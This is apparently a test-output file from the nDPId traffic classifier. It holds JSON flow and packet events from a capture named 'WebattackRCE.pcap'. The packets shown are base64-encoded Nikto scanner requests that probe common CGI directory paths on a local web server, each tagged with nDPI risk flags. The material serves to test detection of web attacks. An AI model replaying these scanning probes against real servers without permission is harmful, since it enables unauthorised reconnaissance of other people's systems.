+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276711,"flow_last_seen":1576420276711,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49614,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1576420276711,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276711,"pkt":"AAAAAAAAAAAAAAAACABFAADEXJRAAEAG351\/AAABfwAAAcHOH5AWt2SMpHJk2oAYAED+uAAAAQEICp1m+w+dZvsPR0VUIC9jZ2ktc3lzLyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276711,"flow_last_seen":1576420276711,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49614,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-sys\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276713,"flow_last_seen":1576420276713,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49616,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1576420276713,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276713,"pkt":"AAAAAAAAAAAAAAAACABFAADG5r1AAEAGVXJ\/AAABfwAAAcHQH5DCed6iQK2\/KYAYAED+ugAAAQEICp1m+xCdZvsQR0VUIC9jZ2ktbG9jYWwvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276713,"flow_last_seen":1576420276713,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49616,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-local\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276714,"flow_last_seen":1576420276714,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276714,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49618,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1576420276714,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276714,"pkt":"AAAAAAAAAAAAAAAACABFAADCR6dAAEAG9Ix\/AAABfwAAAcHSH5C\/OX\/AhojitYAYAED+tgAAAQEICp1m+xKdZvsSR0VUIC9odGJpbi8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276714,"flow_last_seen":1576420276714,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276714,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49618,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/htbin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276717,"flow_last_seen":1576420276717,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276717,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49620,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1576420276717,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276717,"pkt":"AAAAAAAAAAAAAAAACABFAADD3hBAAEAGXiJ\/AAABfwAAAcHUH5AtGuYWzQuuvoAYAED+twAAAQEICp1m+xSdZvsUR0VUIC9jZ2liaW4vIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276717,"flow_last_seen":1576420276717,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276717,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49620,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgibin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276718,"flow_last_seen":1576420276718,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49622,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1576420276718,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276718,"pkt":"AAAAAAAAAAAAAAAACABFAADB4dFAAEAGWmN\/AAABfwAAAcHWH5B7V9nVmVXzCoAYAED+tQAAAQEICp1m+xadZvsWR0VUIC9jZ2lzLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCg0K"} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276718,"flow_last_seen":1576420276718,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49622,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgis\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276719,"flow_last_seen":1576420276719,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49624,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1576420276719,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276719,"pkt":"AAAAAAAAAAAAAAAACABFAADEZD1AAEAG1\/R\/AAABfwAAAcHYH5Ba2lwhPKb01YAYAED+uAAAAQEICp1m+xedZvsXR0VUIC9zY3JpcHRzLyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276719,"flow_last_seen":1576420276719,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49624,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276721,"flow_last_seen":1576420276721,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49626,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1576420276721,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276721,"pkt":"AAAAAAAAAAAAAAAACABFAADEcYRAAEAGyq1\/AAABfwAAAcHaH5DTlEmfv44DhoAYAED+uAAAAQEICp1m+xmdZvsZR0VUIC9jZ2ktd2luLyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276721,"flow_last_seen":1576420276721,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49626,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-win\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276722,"flow_last_seen":1576420276722,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276722,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49628,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1576420276722,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276722,"pkt":"AAAAAAAAAAAAAAAACABFAADF6C5AAEAGVAJ\/AAABfwAAAcHcH5DviNAxcnIUCYAYAED+uQAAAQEICp1m+xqdZvsaR0VUIC9mY2dpLWJpbi8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276722,"flow_last_seen":1576420276722,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276722,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49628,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/fcgi-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276724,"flow_last_seen":1576420276724,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276724,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49630,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1576420276724,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276724,"pkt":"AAAAAAAAAAAAAAAACABFAADEjEdAAEAGr+p\/AAABfwAAAcHeH5D1xLRZpE\/AW4AYAED+uAAAAQEICp1m+xydZvscR0VUIC9jZ2ktZXhlLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276724,"flow_last_seen":1576420276724,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276724,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49630,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-exe\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276725,"flow_last_seen":1576420276725,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1576420276725,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276725,"pkt":"AAAAAAAAAAAAAAAACABFAADFFmlAAEAGJch\/AAABfwAAAcHgH5D+Si57PKwG0oAYAED+uQAAAQEICp1m+x2dZvsdR0VUIC9jZ2ktaG9tZS8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276725,"flow_last_seen":1576420276725,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49632,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-home\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276727,"flow_last_seen":1576420276727,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49634,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1576420276727,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276727,"pkt":"AAAAAAAAAAAAAAAACABFAADFtaJAAEAGho5\/AAABfwAAAcHiH5DFGI2++SyH14AYAED+uQAAAQEICp1m+x+dZvsfR0VUIC9jZ2ktcGVybC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276727,"flow_last_seen":1576420276727,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49634,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-perl\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 